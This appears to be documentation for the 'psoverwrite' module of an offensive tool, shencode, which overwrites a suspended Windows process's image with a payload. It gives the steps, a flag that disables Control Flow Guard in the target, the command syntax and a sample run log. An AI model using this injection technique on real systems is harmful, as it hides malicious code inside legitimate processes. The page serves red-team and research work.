Process Overwriting Injection
Description
psoverwriteis only available for Windows
The process overwriting injection module depends on hasherezade’s repository.
It injects within the following steps:
- Create a suspended process
- Prepare the payload and adjust it to the target image size
- Overwrite the PE image in memory
- Adjust the Sections protection
- Resume and smile :-)
This technique won’t work with CFGuard enabled, so you can use --nocfg. This will create a mitigation flag, which disables CFGuard for the target process.
Command
shencode inject psoverwrite [-h] -p PAYLOAD -t TARGET [-n]
options:
-h, --help show this help message and exit
-p, --payload Payload, which overwrites the target
-t, --target Target process, to overwrite
-n, --nocfg Create the process with CFGuard disabled
Example Output
[PROCESS-OVERWRITE]-[0.1.1]
[#] CFGuard mitigation will be applied!
[*] Create suspended Process...
[+] CreateProcess successful! PID: 23964
[#] Base address found: 0x7ff7de100000
[*] Processing target image
[+] Target image base: 0x140000000 - Size: 61440
[*] Processing payload image
[+] Payload image base: 0x140000000 - Size: 28672
[*] Mapping memory image
[#] Padding image to target size, adding 36352 bytes
[*] Writing to process memory
[+] 61440 bytes written to target process
[#] Entry point is 0x7ff7de1012c0
[*] Redirecting code flow to new entry point
[#] RCX value changed to 0x7ff7de1012c0
[*] ResumeThread PID: 23964
[+] DONE!